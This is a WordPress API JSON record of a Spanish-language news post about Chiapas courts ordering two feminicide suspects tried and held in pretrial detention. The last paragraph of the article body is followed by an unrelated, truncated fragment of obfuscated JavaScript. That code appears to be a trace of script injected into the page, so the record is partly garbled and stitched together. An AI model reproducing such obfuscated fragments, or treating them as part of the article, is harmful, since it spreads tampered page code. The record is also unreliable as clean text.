{"id":5514,"date":"2022-09-30T17:16:19","date_gmt":"2022-09-30T17:16:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5514"},"modified":"2022-09-30T17:16:20","modified_gmt":"2022-09-30T17:16:20","slug":"dicta-poder-judicial-vinculacion-a-proceso-y-prision-preventiva-por-feminicidio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5514","title":{"rendered":"Dicta Poder Judicial vinculaci\u00f3n a Proceso y Prisi\u00f3n Preventiva por Feminicidio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664493083093.jpg\" alt=\"\" class=\"wp-image-5515\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664493083093.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664493083093-300x200.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>29 de septiembre del 2022. El Poder Judicial del Estado, a trav\u00e9s de los Juzgados de Control de San Crist\u00f3bal y Comit\u00e1n, vincul\u00f3 a proceso a dos presuntos feminicidas, determinaciones ejercidas con estricto apego a Derecho y respeto a los Derechos Humanos.<\/p>\n\n\n\n<p>En el primer caso, un juez del Poder Judicial del Estado de Chiapas dict\u00f3 vinculaci\u00f3n a Proceso y como medida cautelar Prisi\u00f3n Preventiva Oficiosa a Lisandro \u201cN\u201d, por su presunta responsabilidad en la muerte de Daniela \u201cN\u201d, ante hechos suscitados en San Crist\u00f3bal de Las Casas.<\/p>\n\n\n\n<p>En el segundo suceso, el Juzgado de Control de Comit\u00e1n, ante los hechos ocurridos en el Barrio de San Sebasti\u00e1n, en el Hotel denominado \u201cEl Recuerdo\u201d; determin\u00f3 vincular a Proceso y como medida cautelar Prisi\u00f3n Preventiva Oficiosa a Graciela \u201cN\u201d, por el presunto feminicidio en contra de una menor de edad de identidad reservada.<\/p>\n\n\n\n<p>Con estas vinculaciones, el Poder Judicial reafirma su compromiso con las y los chiapanecos de seguir impartiendo justicia, y que ning\u00fan hecho criminal que atente contra la integridad o la vida de una ni\u00f1a o mujer quede impune.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>29 de septiembre del 2022. El Poder Judicial del Estado, a trav\u00e9s de los Juzgados de Control de San Crist\u00f3bal y Comit\u00e1n, vincul\u00f3 a proceso a dos presuntos feminicidas, determinaciones ejercidas con estricto apego a Derecho y respeto a los Derechos Humanos. En el primer caso, un juez del Poder Judicial del Estado de Chiapas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5515,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5514","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5514","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5514"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5514\/revisions"}],"predecessor-version":[{"id":5516,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5514\/revisions\/5516"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5515"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5514"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5514"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5514"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}